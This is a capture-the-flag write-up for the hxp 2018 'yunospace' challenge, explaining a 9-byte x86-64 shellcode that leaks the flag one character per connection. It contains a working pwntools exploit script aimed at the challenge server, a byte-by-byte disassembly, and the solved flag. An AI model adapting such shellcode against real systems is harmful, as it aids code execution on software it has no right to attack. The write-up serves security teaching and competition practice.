Rating: 4.0

> How does free code execution sound to you? If only the whole thing wasn’t that narrow.

`yunospace` was a very interseting challenge, it had a very clear target but was very tricky to achieve.

At first `yunospace` creates two empty mmaped regions at randomized adresses, these are used as code (rx) and stack region (rw).

9 bytes are read from `stdin` and put into beginning of the code region. One character of the flag we can choose is put right after our input.
Then all registers besides `rsp` which points into the middle of the stack region are zeroed and we jump to our code.

So clearly we have to write 9 bytes of machine code with a working empty stack to print the flag character.

Some hours spent experimenting and browsing [Intel Assembly Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf), this is what we came up with:

```python
from pwn import *
"""
000000: 0f 05 syscall
000002: 01 ca add edx,ecx
000004: 51 push rcx
000005: 5e pop rsi
000006: ac lods al,BYTE PTR ds:[rsi]
000008: 0f 05 syscall
"""

flag = ""
for i in range(58):
c = remote("195.201.127.119", 8664)
c.recvuntil(b"today?\n").decode()
c.sendline(str(i).encode())
c.recvuntil(b"please.\n").decode()
c.sendline(b"\x0f\x05\x01\xca\x51\x5e\xac\x0f\x05")
out = c.recv(10)
flag += chr(out[6])
print(flag)
```

## So what is happening here?

```
00: 0f 05 syscall
```

Since all registers are `0` this effectively does a `read(0, NULL, 0)`, so the syscall tries to read 0 bytes from stdin into a NULL pointer. Conveniently this does not crash, but has the very important sideeffect of loading the address after the syscall into `rcx`. A rip-relative `lea` would need 7 bytes, a `call` `pop` combo would use 6 bytes. This version combined with the next only uses 4!

```
02: 01 ca add edx,ecx
```

This adds `ecx` to `edx`, which specifies the length of the `write` syscall. We just need `edx` to be >6 to print the flag character after our code so any big positive value works for us, we do not care about a page fault after we have received our output. Most importantly this instruction has opcode `01` which will be used later.

```
04: 51 push rcx
05: 5e pop rsi
```

This moves the 64bit-address from `rcx` to `rsi` wich specifies the buffer to print for `write`. It only needs 2 bytes because `push` and `pop` are two of the few instructions that do not need REX-Prefix for 64bit.

```
06: ac lods al,BYTE PTR ds:[rsi]
```

`lodsb` loads the value at the address pointed to by `rsi` into `al` and then increments `rsi`. So `al = [rsi]; rsi++`. Since `rsi` points to our `add edx,ecx` instruction which has opcode `01` this sets `rax` to 1, the syscall number for `write`! This was the last bit of magic we had to find to save that crucial last byte!

```
08: 0f 05 syscall
```

`write(0, <address of add + 1>, (32bit-truncated) <address of add>)`. This writes to `stdin` (not `stdout`!) since `rdi` is zero. But we still get the output on our terminal! (Thank you linux!). This behaviour means we do not have to set `rdi` to 1 for printing to `stdout` which saves us 2 bytes.

The program subsequently crashes but we already have what we want so we don't care.

Flag is `hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}`

Original writeup (https://www.sigflag.at/blog/2018/writeup-hxp-yunospace/).
kowuDec. 11, 2018, 2:53 p.m.

Probably not the intended solution, but definitely the most amazing one.